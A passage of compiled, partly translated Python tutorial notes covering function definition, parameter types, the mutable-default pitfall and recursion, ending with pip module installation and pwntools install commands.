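error = None
try:
    d[(1, [2, 3])] = 'fails'     # contains a list, so the tuple is unhashable
except TypeError as e:
    error = e

print(d)                         # {(1, 2, 3): 'ok'}
print(type(error).__name__)      # TypeError
```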

Reference source code

the_dict.py

the_set.py

Python Programming Quick Guide - Functions

https://www.liaoxuefeng.com/wiki/1016959663602400/1017063413904832

https://docs.python.org/3/tutorial/index.html

Function

We know that the formula for calculating the area of a circle is

S = πr^2

When we know the value of radius r, we can calculate the area according to the formula. Suppose we need to calculate the area of 3 circles of different sizes.

r1 = 12.34
r2 = 9.08
r3 = 73.1
s1 = 3.14 * r1 * r1
s2 = 3.14 * r2 * r2
s3 = 3.14 * r3 * r3

When code repeats in a regular pattern, beware: writing 3.14 * x * x each time is not only tedious, but if you want to change 3.14 to 3.14159265359, you have to replace every occurrence.

With functions, instead of writing s = 3.14 * x * x every time, we write the more meaningful function call s = area_of_circle(x), and the function area_of_circle itself only needs to be written once, so it can be called multiple times.
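A minimal sketch of such a function is shown here. It uses math.pi instead of the literal 3.14, which is a choice made for this example; the point is that the constant now lives in exactly one place.

```python
import math

def area_of_circle(r):
    # The value of pi appears only here, so changing it is a one-line edit.
    return math.pi * r * r

for r in (12.34, 9.08, 73.1):
    print(area_of_circle(r))
```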

Basically all high-level languages support functions, and Python is no exception. Not only is Python very flexible in defining functions, it also has many useful built-in functions that can be called directly.

Abstraction

Abstraction is a very common concept in mathematics. As an example.

Calculating the sum of a series, e.g., 1 + 2 + 3 + ... + 100, is very inconvenient to write out, so mathematicians invented the summation symbol ∑, with which 1 + 2 + 3 + ... + 100 can be written as:

\sum_{n=1}^{100} n

This abstract notation is very powerful because we see that ∑ can be understood as a summation, rather than reducing to a low-level addition operation.

Moreover, this abstract notation is scalable, e.g.

\sum_{n=1}^{100} (n^2 + 1)

Reduced to addition it becomes.

(1 x 1 + 1) + (2 x 2 + 1) + (3 x 3 + 1) + ... + (100 x 100 + 1)

As you can see, abstraction allows us to think directly at a higher level, without caring about the underlying concrete computational process.

Writing computer programs is the same, and functions are one of the most basic ways of abstracting code.
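As a small illustration, Python's built-in sum() plays the role of ∑: the two series discussed above can each be written in one line without spelling out the individual additions. The variable names are only illustrative.

```python
total = sum(range(1, 101))                          # 1 + 2 + ... + 100
total_sq = sum(n * n + 1 for n in range(1, 101))    # (1*1 + 1) + ... + (100*100 + 1)

print(total)      # 5050
print(total_sq)   # 338450
```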

Calling functions

Python has a lot of useful functions built in that we can call directly.

To call a function, you need to know the name of the function and its arguments, for example, the function abs that finds the absolute value has only one argument. The documentation can be viewed directly from Python's official website at

http://docs.python.org/3/library/functions.html#abs

You can also view the help information for the abs function at the interactive command line via help(abs).

To invoke the abs function.

>>> abs(100)
100
>>> abs(-20)
20
>>> abs(12.34)
12.34

Calling a function with the wrong number of arguments raises a TypeError, and Python tells you explicitly that abs() takes exactly one argument but two were given.

>>> abs(1, 2)
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
TypeError: abs() takes exactly one argument (2 given)

If the number of arguments is correct but the argument type is not accepted by the function, a TypeError is also raised, with an error message saying that str is the wrong argument type.

>>> abs('a')
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
TypeError: bad operand type for abs(): 'str'

The max() function can take any number of arguments and returns the largest one.

>>> max(1, 2)
2
>>> max(2, 3, 1, -5)
3

Data type conversions

Python's built-in common functions also include data type conversion functions, such as the int() function that converts other data types to integers:

>>> int('123')
123
>>> int(12.34)
12
>>> float('12.34')
12.34
>>> str(1.23)
'1.23'
>>> str(100)
'100'
>>> bool(1)
True
>>> bool('')
False

A function name is actually a reference to a function object, and it is possible to assign the function name to a variable, which is equivalent to giving the function an "alias".

>>> a = abs # Variable a points to the abs function
>>> a(-1) # So you can also call the abs function from a
1

Define function

In Python, you define a function with the def statement: write the function name, the parentheses, the parameters inside the parentheses, and the colon : in that order, then write the function body in an indented block. The return value of the function is returned with the return statement.

Let's take a custom my_abs function for absolute values as an example.

# -*- coding: utf-8 -*-
def my_abs(x):
    if x >= 0:
        return x
    else:
        return -x

print(my_abs(-99))

Please test it yourself and call my_abs to see if the returned result is correct.

Note that when the statements inside the function body are executed, the function finishes as soon as it reaches return and hands back the result. Thus, very complex logic can be implemented inside functions through conditional judgments and loops.

If there is no return statement, the function will also return the result when it finishes executing, but the result will be None. return None can be abbreviated to return.
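Both cases can be checked with a short sketch; the functions greet and check are hypothetical examples, not part of the tutorial's source code.

```python
def greet(name):
    print('Hello,', name)    # no return statement at all

def check(x):
    if x < 0:
        return               # bare return, same as "return None"
    return x

r1 = greet('Bob')
print(r1)                    # None
print(check(-1))             # None
print(check(3))              # 3
```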

When defining functions in the Python interactive environment, note that Python will show a ... prompt. When you finish defining the function you need to press enter twice to get back to the >>> prompt.

┌────────────────────────────────────────────────────────┐
│Command Prompt - python                           - □ x │
├────────────────────────────────────────────────────────┤
│>>> def my_abs(x):                                      │
│...     if x >= 0:                                      │
│...         return x                                    │
│...     else:                                           │
│...         return -x                                   │
│...                                                     │
│>>> my_abs(-9)                                          │
│9                                                       │
│>>> _                                                   │
│                                                        │
│                                                        │
└────────────────────────────────────────────────────────┘

If you have already saved the function definition of my_abs() in a file named abstest.py, you can start the Python interpreter in the directory containing that file and import the my_abs() function with from abstest import my_abs. Note that abstest is the file name (without the .py extension).

┌────────────────────────────────────────────────────────┐
│Command Prompt - python                           - □ x │
├────────────────────────────────────────────────────────┤
│>>> from abstest import my_abs                          │
│>>> my_abs(-9)                                          │
│9                                                       │
│>>> _                                                   │
│                                                        │
│                                                        │
│                                                        │
│                                                        │
│                                                        │
│                                                        │
│                                                        │
└────────────────────────────────────────────────────────┘

The usage of import is described in detail in the subsequent section Modules.

Empty functions

If you want to define an empty function that doesn't do anything, you can use the pass statement.

def nop():
    pass

The pass statement doesn't do anything, so what's the point? Actually pass can be used as a placeholder, for example, if you haven't figured out how to write the code for a function yet, you can put a pass first so that the code can run.

pass can also be used in other statements, such as.

if age >= 18:
    pass

Without pass, the code will fail with a syntax error.

Parameter checking

When calling a function with the wrong number of arguments, the Python interpreter will automatically check for it and throw TypeError:

>>> my_abs(1, 2)
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
TypeError: my_abs() takes 1 positional argument but 2 were given

But if the argument type is wrong, the Python interpreter can't check it for us. Try the difference between my_abs and the built-in function abs.

>>> my_abs('A')
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "<stdin>", line 2, in my_abs
TypeError: '>=' not supported between instances of 'str' and 'int'
>>> abs('A')
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
TypeError: bad operand type for abs(): 'str'

The built-in function abs checks its argument and reports an error when an improper one is passed in, while the my_abs we defined has no parameter checking: the error arises in the if statement, with a different error message than abs. So this function definition is not good enough.

Let's modify the definition of my_abs to do an argument type check and allow only arguments of integer and floating point types. The data type check can be implemented with the built-in function isinstance().

def my_abs(x):
    if not isinstance(x, (int, float)):
        raise TypeError('bad operand type')
    if x >= 0:
        return x
    else:
        return -x

With the addition of parameter checking, the function can throw an error if the wrong type of parameter is passed in.

>>> my_abs('A')
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "<stdin>", line 3, in my_abs
TypeError: bad operand type

Error and exception handling will be covered later.

Returning multiple values

Can a function return more than one value? The answer is yes.

For example, in a game where you often need to move from one point to another, given the coordinates, displacement and angle, you can calculate the new coordinates as follows.

import math

def move(x, y, step, angle=0):
    nx = x + step * math.cos(angle)
    ny = y - step * math.sin(angle)
    return nx, ny

The import math statement imports the math module and allows subsequent code to reference sin, cos and the other functions it contains.

Then, we can get both the return values.

>>> x, y = move(100, 100, 60, math.pi / 6)
>>> print(x, y)
151.96152422706632 70.0

But in fact this is only an illusion, and the Python function still returns a single value:

>>> r = move(100, 100, 60, math.pi / 6)
>>> print(r)
(151.96152422706632, 70.0)

The return value is actually a tuple! Syntactically, the parentheses can be omitted when returning a tuple, and multiple variables can receive a tuple at the same time, each assigned the corresponding value by position. So when a Python function returns multiple values, it is really returning a tuple; it is just easier to write.
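The same mechanism can be sketched with a simpler function. The helper min_max is hypothetical and only serves to show that the "two values" are one tuple that is then unpacked by position.

```python
def min_max(values):
    # "return a, b" builds and returns the single tuple (a, b).
    return min(values), max(values)

result = min_max([3, 1, 4, 1, 5])
print(type(result).__name__)   # tuple

lo, hi = result                # unpack the tuple by position
print(lo, hi)                  # 1 5
```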

Summary

When defining a function, you need to determine the function name and the number of arguments.

If necessary, you can first check the data types of the arguments.

return can be used inside the function body to return the result of the function at any time.

If the function is executed and there is no return statement, it automatically returns None.

The function can return multiple values at the same time, but it is actually a tuple.

Reference source code

def_func.py

Parameters of a function

When defining a function, we fix the names and positions of the parameters, and the function's interface definition is complete. For the caller of the function, it's enough to know how to pass the right arguments and what value the function will return; the complex logic inside the function is encapsulated and the caller doesn't need to understand it.

Python's function definitions are very simple, but very flexible. In addition to the normal definition of mandatory arguments, you can also use default, variable, and keyword arguments, making the function definition an interface that not only handles complex arguments, but also simplifies the caller's code.

Positional parameters

Let's start by writing a function that calculates x^2:

def power(x):
    return x * x

For the power(x) function, the parameter x is a positional parameter.

When we call the power function, we must pass in one and only one parameter x.

>>> power(5)
25
>>> power(15)
225

Now, what if we want to calculate x^3? We can define another power3 function, but what if we want to calculate x^4, x^5, ...? We can't define an infinite number of functions.

It may have occurred to you that power(x) can be modified to power(x, n) to compute x^n. Let's do just that:

def power(x, n):
    s = 1
    while n > 0:
        n = n - 1
        s = s * x
    return s

For this modified power(x, n) function, any nth power can be computed as follows.

>>> power(5, 2)
25
>>> power(5, 3)
125

The modified power(x, n) function has two parameters: x and n, both of which are positional parameters. When the function is called, the two values passed in are assigned to the parameters x and n in order of position.

Default parameters

The new power(x, n) function definition is fine. However, the old calling code now fails, because we added a parameter and the old calls are missing an argument:

>>> power(5)
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
TypeError: power() missing 1 required positional argument: 'n'

Python's error message is clear: the call to the function power() is missing a positional argument n.

This is where default parameters come into play. Since we often calculate x^2, it is perfectly reasonable to set the default value of the second parameter, n, to 2.

def power(x, n=2):
    s = 1
    while n > 0:
        n = n - 1
        s = s * x
    return s

Thus, when we call power(5), it is equivalent to calling power(5, 2).

>>> power(5)
25
>>> power(5, 2)
25

For any other value of n, n must be passed explicitly, such as power(5, 3).

As you can see from the above example, default parameters can simplify function calls. When setting default parameters, there are a few things to keep in mind.

First, the mandatory parameters must come first and the default parameters after them; otherwise the Python interpreter reports an error (think about why default parameters can't be placed before mandatory parameters).

Second, how to choose which parameters get default values.

When a function has more than one parameter, put the parameters that vary a lot first and the parameters that vary little last. The parameters that vary little can then be made default parameters.
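The ordering rule can be checked without crashing a script by compiling the offending definition from a string. This is only a sketch: the reversed signature power(n=2, x) is a deliberately invalid, hypothetical variant of the power function above. With such a signature a call like power(5) would be ambiguous, which is why Python rejects the definition outright.

```python
# A default parameter placed before a mandatory one (deliberately invalid).
source = "def power(n=2, x):\n    return x ** n\n"

try:
    compile(source, '<example>', 'exec')
    rejected = False
except SyntaxError:
    rejected = True

print(rejected)   # True
```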

What are the benefits of using default parameters? The biggest benefit is that it reduces the difficulty of calling the function.

For example, let's write a function to register a first grade student and pass in two parameters name and gender.

def enroll(name, gender):
    print('name:', name)
    print('gender:', gender)

Calling the enroll() function then requires passing in just two arguments.

>>> enroll('Sarah', 'F')
name: Sarah
gender: F

What if I want to continue passing in information such as age, city, etc.? This would make calling the function much more complicated.

We can set age and city as default parameters.

def enroll(name, gender, age=6, city='Beijing'):
    print('name:', name)
    print('gender:', gender)
    print('age:', age)
    print('city:', city)

In this way, most students are not required to provide their age and city when registering, but only the two required parameters.

>>> enroll('Sarah', 'F')
name: Sarah
gender: F
age: 6
city: Beijing

Only students who do not match the default parameters will be required to provide additional information.

enroll('Bob', 'M', 7)
enroll('Adam', 'M', city='Tianjin')

As you can see, default parameters reduce the difficulty of calling a function, and when a more complex call is needed, more arguments can be passed to achieve it. Whether the call is simple or complex, only one function needs to be defined.

When there are multiple default parameters, the call can provide them in order. For example, calling enroll('Bob', 'M', 7) means that, besides the two parameters name and gender, the last argument is applied to the parameter age, while the city parameter, since it is not provided, still uses its default value.

It is also possible to provide only some of the default parameters, out of order. In that case you must write the parameter name. For example, calling enroll('Adam', 'M', city='Tianjin') means that the city parameter uses the value passed in and the other default parameters continue to use their default values.

Default parameters are useful, but they can trip you up if used improperly. Their biggest pitfall is demonstrated below.

First define a function that takes a list, appends 'END' to it, and returns it.

def add_end(L=[]):
    L.append('END')
    return L

When you call it normally, the result seems good:

>>> add_end([1, 2, 3])
[1, 2, 3, 'END']
>>> add_end(['x', 'y', 'z'])
['x', 'y', 'z', 'END']

When you call with the default parameters, the result is also correct at first:

>>> add_end()
['END']

However, when add_end() is called again, the result is not correct:

>>> add_end()
['END', 'END']
>>> add_end()
['END', 'END', 'END']

Many beginners are puzzled by the fact that the default argument is [], but the function seems to "remember" the list after adding 'END' each time.

The reason for this is as follows.

The default value of the parameter L, namely [], is calculated once, when the Python function is defined. The default parameter L is also a variable, and it points to that [] object. If a call changes the contents of L, the contents of the default parameter are changed for the next call, and it is no longer the [] it was when the function was defined.
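This can be observed directly, as a rough sketch: a function object keeps its default values in the __defaults__ attribute, and every call that omits L receives that very same list object.

```python
def add_end(L=[]):
    L.append('END')
    return L

print(add_end.__defaults__)    # ([],)  evaluated once, at definition time

first = add_end()
second = add_end()
print(first is second)         # True: both calls returned the same list object
print(add_end.__defaults__)    # (['END', 'END'],)
```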

One thing to keep in mind when defining default parameters: they must point to immutable objects!

To fix the above example, we can use the immutable object None:

def add_end(L=None):
    if L is None:
        L = []
    L.append('END')
    return L

Now, no matter how many times it is called, there will be no problem:

>>> add_end()
['END']
>>> add_end()
['END']

Why design immutable objects like str and None? Because once an immutable object is created, the data inside it cannot be modified, which reduces the errors caused by modifying data. In addition, because the object does not change, no locks are needed to read it simultaneously in a multitasking environment. When writing a program, if an object can be designed as immutable, try to design it that way.

Variable arguments

Variable parameters can also be defined in Python functions. As the name implies, the number of arguments passed in is variable: it can be 1, 2, or any number, including 0.

Let's take a math problem as an example: given a set of numbers a, b, c, ..., calculate a^2 + b^2 + c^2 + ....

To define this function, we must determine the input parameters. Since the number of parameters is uncertain, we might first think of passing a, b, c, ... as a list or a tuple, so that the function can be defined as follows.

def calc(numbers):
    sum = 0
    for n in numbers:
        sum = sum + n * n
    return sum

But to call it, a list or tuple needs to be assembled first:

>>> calc([1, 2, 3])
14
>>> calc((1, 3, 5, 7))
84

If variable parameters are utilized, the way the function is called can be simplified as follows.

>>> calc(1, 2, 3)
14
>>> calc(1, 3, 5, 7)
84

So, we change the parameters of the function to variable parameters.

def calc(*numbers):
    sum = 0
    for n in numbers:
        sum = sum + n * n
    return sum

Defining a variable parameter is simply a matter of adding a * sign in front of the parameter compared to defining a list or tuple parameter. Inside the function, the argument numbers is received as a tuple, so the function code remains exactly the same. However, the function can be called with any number of arguments, including 0 arguments.

>>> calc(1, 2)
5
>>> calc()
0

What if you already have a list or tuple and want to call a function that takes variable arguments? You can do this:

>>> nums = [1, 2, 3]
>>> calc(nums[0], nums[1], nums[2])
14

This works but is too cumbersome, so Python allows you to add a * sign in front of a list or tuple to pass its elements as variable arguments.

>>> nums = [1, 2, 3]
>>> calc(*nums)
14

*nums means that all elements of the list nums are passed in as variable arguments. This style is quite useful and common.

Keyword arguments

Variable arguments allow you to pass in zero or any number of arguments, which are automatically assembled into a tuple when the function is called. Keyword arguments allow you to pass in zero or any number of arguments with parameter names, which are automatically assembled into a dict inside the function. See the example.

def person(name, age, **kw):
    print('name:', name, 'age:', age, 'other:', kw)

The function person accepts the keyword argument kw in addition to the mandatory arguments name and age. When calling this function, you may pass only the mandatory arguments.

>>> person('Michael', 30)
name: Michael age: 30 other: {}

Any number of keyword parameters can also be passed in.

>>> person('Bob', 35, city='Beijing')
name: Bob age: 35 other: {'city': 'Beijing'}
>>> person('Adam', 45, gender='M', job='Engineer')
name: Adam age: 45 other: {'gender': 'M', 'job': 'Engineer'}

What is the use of the keyword argument? It extends the function's functionality. For example, in the person function, we are guaranteed to receive the two parameters name and age, but if the caller would like to provide more parameters, we can receive them as well. Imagine you are doing a user registration function and everything is optional except for the user name and age which are required, using keyword arguments to define this function will satisfy the registration requirement.

Similar to variable parameters, you can also assemble a dict first, and then, convert that dict to a keyword parameter to pass in.

>>> extra = {'city': 'Beijing', 'job': 'Engineer'}
>>> person('Jack', 24, city=extra['city'], job=extra['job'])
name: Jack age: 24 other: {'city': 'Beijing', 'job': 'Engineer'}

Of course, the above complex call can be written in a simplified way as follows.

>>> extra = {'city': 'Beijing', 'job': 'Engineer'}
>>> person('Jack', 24, **extra)
name: Jack age: 24 other: {'city': 'Beijing', 'job': 'Engineer'}

**extra means that all key-value pairs of the dict extra are passed as keyword arguments to the **kw parameter of the function, so kw receives a dict. Note that the dict received by kw is a copy of extra: changes to kw do not affect extra outside the function.
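The copy behavior can be checked with a small sketch. This variant of person is hypothetical: it adds a 'seen' key to kw and returns it, purely to make the effect visible. Note that the copy is shallow, so the values themselves are still shared between the two dicts.

```python
def person(name, age, **kw):
    kw['seen'] = True          # modifies only the function's own dict
    return kw

extra = {'city': 'Beijing', 'job': 'Engineer'}
received = person('Jack', 24, **extra)

print(received)   # {'city': 'Beijing', 'job': 'Engineer', 'seen': True}
print(extra)      # {'city': 'Beijing', 'job': 'Engineer'}
```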

Named keyword arguments

With keyword arguments, the caller of a function can pass in any keyword argument without restriction. To find out exactly what was passed in, the function has to check kw.

Still using the person() function as an example, we want to check for city and job parameters.

def person(name, age, **kw):
    if 'city' in kw:
        # With city parameter
        pass
    if 'job' in kw:
        # With job parameter
        pass
    print('name:', name, 'age:', age, 'other:', kw)

However, the caller can still pass in unrestricted keyword arguments.

>>> person('Jack', 24, city='Beijing', addr='Chaoyang', zipcode=123456)

If you want to restrict the names of the keyword arguments, you can use named keyword arguments, for example, to receive only city and job as keyword arguments. The functions defined in this way are as follows.

def person(name, age, *, city, job):
    print(name, age, city, job)

Unlike the keyword parameter **kw, the named keyword parameter requires a special separator *, and the parameters following * are considered as named keyword parameters.

It is called as follows.

>>> person('Jack', 24, city='Beijing', job='Engineer')
Jack 24 Beijing Engineer

If a function definition already has a variable argument, the named keyword argument that follows no longer needs a special separator *.

def person(name, age, *args, city, job):
    print(name, age, args, city, job)

Named keyword parameters must be passed with a parameter name, unlike positional parameters. If the parameter name is not passed, the call will report an error.

>>> person('Jack', 24, 'Beijing', 'Engineer')
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
TypeError: person() missing 2 required keyword-only arguments: 'city' and 'job'

Because the parameter names city and job are missing from the call, the Python interpreter treats the first two arguments as positional arguments and passes the last two to *args, so the named keyword parameters city and job are missing and the call fails.

Named keyword arguments can have default values, thus simplifying the call.

def person(name, age, *, city='Beijing', job):
    print(name, age, city, job)

Since the named keyword parameter city has a default value, it can be invoked without passing the city parameter.

>>> person('Jack', 24, job='Engineer')
Jack 24 Beijing Engineer

When using named keyword arguments, take special care to add a * as a special separator if there are no variable arguments. If * is missing, the Python interpreter cannot tell positional parameters from named keyword parameters.

def person(name, age, city, job):
    # Missing *, so city and job are treated as positional parameters
    pass

Parameter combinations

To define functions in Python, you can use mandatory parameters, default parameters, variable parameters, keyword parameters, and named keyword parameters, all five of which can be used in combination. However, please note that the order of parameter definition must be: mandatory parameters, default parameters, variable parameters, named keyword parameters, and keyword parameters.

For example, to define a function with several of these parameters.

def f1(a, b, c=0, *args, **kw):
    print('a =', a, 'b =', b, 'c =', c, 'args =', args, 'kw =', kw)

def f2(a, b, c=0, *, d, **kw):
    print('a =', a, 'b =', b, 'c =', c, 'd =', d, 'kw =', kw)

When the function is called, the Python interpreter automatically passes in the corresponding arguments according to their positions and names.

>>> f1(1, 2)
a = 1 b = 2 c = 0 args = () kw = {}
>>> f1(1, 2, c=3)
a = 1 b = 2 c = 3 args = () kw = {}
>>> f1(1, 2, 3, 'a', 'b')
a = 1 b = 2 c = 3 args = ('a', 'b') kw = {}
>>> f1(1, 2, 3, 'a', 'b', x=99)
a = 1 b = 2 c = 3 args = ('a', 'b') kw = {'x': 99}
>>> f2(1, 2, d=99, ext=None)
a = 1 b = 2 c = 0 d = 99 kw = {'ext': None}

The most amazing thing is that you can also call the above functions with a tuple and a dict.

>>> args = (1, 2, 3, 4)
>>> kw = {'d': 99, 'x': '#'}
>>> f1(*args, **kw)
a = 1 b = 2 c = 3 args = (4,) kw = {'d': 99, 'x': '#'}
>>> args = (1, 2, 3)
>>> kw = {'d': 88, 'x': '#'}
>>> f2(*args, **kw)
a = 1 b = 2 c = 3 d = 88 kw = {'x': '#'}

So, for any function, you can call it by something like func(*args, **kw), regardless of how its arguments are defined.
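One practical use of this property is a wrapper that forwards whatever it receives to another function. The following is a minimal sketch; the names logged and calls are made up for illustration and are not part of the original tutorial.

```python
import functools

def logged(func):
    """Wrap func so every call is recorded, then forwarded unchanged."""
    calls = []

    @functools.wraps(func)
    def wrapper(*args, **kw):
        # args is a tuple of positional arguments, kw is a dict of keyword arguments
        calls.append((args, kw))
        return func(*args, **kw)

    wrapper.calls = calls
    return wrapper

@logged
def f2(a, b, c=0, *, d, **kw):
    return a, b, c, d, kw

result = f2(1, 2, d=99, ext=None)
print(result)     # (1, 2, 0, 99, {'ext': None})
print(f2.calls)   # [((1, 2), {'d': 99, 'ext': None})]
```

The wrapper does not need to know how f2 defines its parameters; it only passes the tuple and dict along.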

Although it is possible to combine all 5 kinds of parameters, do not use too many combinations at the same time, otherwise the function interface becomes hard to understand.

Summary

Python's functions have a very flexible argument form, allowing both simple calls and very complex arguments to be passed in.

A default argument should be an immutable object. A mutable default (such as a list) is created once, when the function is defined, and is shared by every call, which leads to logic errors!
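A short sketch of the pitfall and the usual fix. The function names add_end_buggy and add_end are chosen here for illustration.

```python
def add_end_buggy(items=[]):
    # The default list is created once, at definition time,
    # so every call without an argument appends to the same object.
    items.append('END')
    return items

def add_end(items=None):
    # None is immutable; a fresh list is created inside each call.
    if items is None:
        items = []
    items.append('END')
    return items

first = add_end_buggy()
second = add_end_buggy()
print(second)            # ['END', 'END']
print(first is second)   # True: both names refer to the shared default list
print(add_end(), add_end())
```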

Note the syntax for defining variable and keyword arguments.

*args is a variable parameter; args receives a tuple.

**kw is a keyword argument, kw receives a dict.

And the syntax of how to pass variable and keyword arguments when calling a function.

Variable parameters can be passed either directly: func(1, 2, 3) or by assembling a list or tuple first and then passing it through *args: func(*(1, 2, 3)).

Keyword arguments can either be passed directly: func(a=1, b=2), or assembled first in a dict and then passed in via **kw: func(**{'a': 1, 'b': 2}).

Using *args and **kw is the customary way of writing Python, but of course other parameter names can be used, but it is better to use the customary usage.

Named keyword arguments are intended to limit the parameter names that can be passed in by the caller, while providing default values.

Don't forget to write the separator * when defining named keyword parameters without variable parameters, otherwise they will be defined as positional parameters.

Reference source code

var_args.py

kw_args.py

Recursive functions

Inside a function, other functions can be called. If a function calls itself internally, that function is recursive.

As an example, let's calculate the factorial n! = 1 x 2 x 3 x ... x n, represented by the function fact(n). It can be seen that

fact(n) = n! = 1 x 2 x 3 x ... x (n-1) x n = (n-1)! x n = fact(n-1) x n

So, fact(n) can be expressed as n x fact(n-1), with special treatment required only for n=1.

Thus, fact(n) is written out recursively as.

def fact(n):
    if n==1:
        return 1
    return n * fact(n - 1)

The above is a recursive function. Try:

>>> fact(1)
1
>>> fact(5)
120
>>> fact(100)
93326215443944152681699238856266700490715968264381621468592963895217599993229915608941463976156518286253697920827223758251185210916864000000000000000000000000

If we calculate fact(5), we can see the calculation process according to the function definition as follows.

===> fact(5)
===> 5 * fact(4)
===> 5 * (4 * fact(3))
===> 5 * (4 * (3 * fact(2)))
===> 5 * (4 * (3 * (2 * fact(1))))
===> 5 * (4 * (3 * (2 * 1)))
===> 5 * (4 * (3 * 2))
===> 5 * (4 * 6)
===> 5 * 24
===> 120

Recursive functions have the advantage of being simple to define and logically clear. In theory, all recursive functions can be written as loops, but the logic of loops is not as clear as recursion.
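For comparison, here is a loop-based version of the same calculation. The name fact_loop is made up for this sketch, and n >= 1 is assumed, as in the recursive version.

```python
def fact_loop(n):
    """Compute n! with a loop instead of recursion (assumes n >= 1)."""
    product = 1
    for i in range(2, n + 1):
        product *= i
    return product

print(fact_loop(5))   # 120
```

Because no function calls are nested, this version does not grow the stack no matter how large n is.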

Using recursive functions requires care to prevent stack overflows. In computers, function calls are implemented through a data structure called a stack. Whenever a function call is entered, a layer of stack frames is added to the stack, and whenever the function returns, a layer of stack frames is subtracted from the stack. Since the size of the stack is not infinite, too many recursive calls can cause the stack to overflow. Try fact(1000).

>>> fact(1000)
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "<stdin>", line 4, in fact
  ...
  File "<stdin>", line 4, in fact
RuntimeError: maximum recursion depth exceeded in comparison

The solution to recursive call stack overflow is to optimize it by tail recursion. In fact, tail recursion has the same effect as a loop, so it is okay to think of a loop as a special kind of tail recursive function.

Tail recursion means that the function calls itself as the very last step of its return statement, and the return statement contains nothing other than that call (no further expression is applied to its result). In this way, a compiler or interpreter can optimize the tail call so that the recursion, no matter how deep, occupies only one stack frame and no stack overflow occurs.

The fact(n) function above is not tail recursive because return n * fact(n - 1) introduces a multiplicative expression. To change to a tail recursive approach, a little more code is needed, mainly to pass the product of each step into the recursive function.

def fact(n):
    return fact_iter(n, 1)

def fact_iter(num, product):
    if num == 1:
        return product
    return fact_iter(num - 1, num * product)

As you can see, return fact_iter(num - 1, num * product) returns only the recursive function itself, num - 1 and num * product are calculated before the function call and do not affect the function call.

The call to fact(5) corresponding to fact_iter(5, 1) is as follows.

===> fact_iter(5, 1)
===> fact_iter(4, 5)
===> fact_iter(3, 20)
===> fact_iter(2, 60)
===> fact_iter(1, 120)
===> 120

When tail recursive calls are made, the stack does not grow if optimizations are made, so no matter how many calls are made, it will not cause the stack to overflow.

Unfortunately, most programming languages are not optimized for tail recursion, and neither is the Python interpreter, so even if you change the fact(n) function above to a tail recursive approach, it will still result in a stack overflow.
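This can be checked directly. The sketch below calls the tail recursive version with a depth just beyond the interpreter's limit; it assumes Python 3.5 or later, where the error is reported as RecursionError (a subclass of RuntimeError).

```python
import sys

def fact_iter(num, product):
    if num == 1:
        return product
    return fact_iter(num - 1, num * product)

def fact(n):
    return fact_iter(n, 1)

# Ask for more nested calls than the interpreter allows.
depth = sys.getrecursionlimit() + 100
try:
    fact(depth)
    overflowed = False
except RecursionError:
    overflowed = True

print(overflowed)
```

The tail call is not turned into a loop, so each call still costs one stack frame.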

Summary

The advantage of using recursive functions is that the logic is simple and clear, and the disadvantage is that calls that are too deep can lead to stack overflow.

Languages optimized for tail recursion can prevent stack overflows by tail recursion. Tail recursion is in fact equivalent to looping, and programming languages that don't have looping statements can only implement loops via tail recursion.

Python's standard interpreter is not optimized for tail recursion, and any recursive function has a stack overflow problem.

Reference source code

recur.py

https://yulizi123.github.io/tutorials/python-basic/basic/

https://docs.python.org/3/

https://docs.pwntools.com/en/stable/

Module installation

There are many ways to install external modules, and the form of installation varies from system to system. Installing Python packages on Windows, for example, might even kill you. Haha.

What is an external module?

An external module is what you use when you import something into a python script.

import numpy as np
import matplotlib.pyplot as plt

Numpy and matplotlib are both external modules that need to be installed. They are not part of python's own modules.

Installing Numpy

For example, there are many ways to install modules for scientific operations, such as numpy. On Windows, the easiest way is to install Anaconda, which has many necessary external modules. Install one, and save yourself the trouble of installing others.

However, I want to talk about downloading the installation package and installing it on Windows. For example, on the Numpy installer website, you can find various versions of numpy.


In NumPy 1.10.2, we can find installers for Windows, but no Windows installers have been added to the new version yet. Then choose the appropriate "exe" installer for your system and python version. Download and install.


If you are on MacOS or Linux, this external module is much easier to install. You can install it by typing a single command into your computer's Terminal. Windows seems to need some extra setup to do the same thing; you might want to look it up.

Then you can install it if you type in this form.

$ pip install the name of the module you want

For example

$ pip install numpy # This is for the python2+ version
$ pip3 install numpy # This is for the python3+ version

Updating external modules

Updating external modules with pip is very simple. All you need to do is type the following command into Terminal. The -U here is short for --upgrade.

$ pip install -U numpy # This is for the python2+ version
$ pip3 install -U numpy # This is for the python3+ version
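To find out from inside Python whether a module is already installed, something like the following sketch can be used. The helper name is_installed is made up here; importlib.util.find_spec is part of the standard library.

```python
import importlib.util

def is_installed(module_name):
    """Return True if the named top-level module can be found for import."""
    return importlib.util.find_spec(module_name) is not None

print(is_installed('json'))   # json ships with Python itself
for name in ('numpy', 'matplotlib'):
    status = 'installed' if is_installed(name) else 'missing, try: pip install ' + name
    print(name, status)
```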

pwntools

pwntools is a CTF framework and exploit development library. Written in Python, it is designed for rapid prototyping and development, and intended to make exploit writing as simple as possible.

The primary location for this documentation is docs.pwntools.com, which uses readthedocs. It comes in three primary flavors:

Installation

Pwntools is best supported on 64-bit Ubuntu LTS releases (14.04, 16.04, 18.04, and 20.04). Most functionality should work on any Posix-like distribution (Debian, Arch, FreeBSD, OSX, etc.).

Prerequisites

To get the most out of pwntools, you should install the following system libraries.

Binutils
Python Development Headers
- Ubuntu
- Mac OS X

Released Version

pwntools is available as a pip package for both Python2 and Python3.

Python3

$ apt-get update
$ apt-get install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential
$ python3 -m pip install --upgrade pip
$ python3 -m pip install --upgrade pwntools

Python2 (Deprecated)

NOTE: Pwntools maintainers STRONGLY recommend using Python3 for all future Pwntools-based scripts and projects.

Additionally, due to pip dropping support for Python2, a specific version of pip must be installed.

$ apt-get update
$ apt-get install python python-pip python-dev git libssl-dev libffi-dev build-essential
$ python2 -m pip install --upgrade pip==20.3.4
$ python2 -m pip install --upgrade pwntools

Command-Line Tools

When installed with sudo the above commands will install Pwntools’ command-line tools to somewhere like /usr/bin.

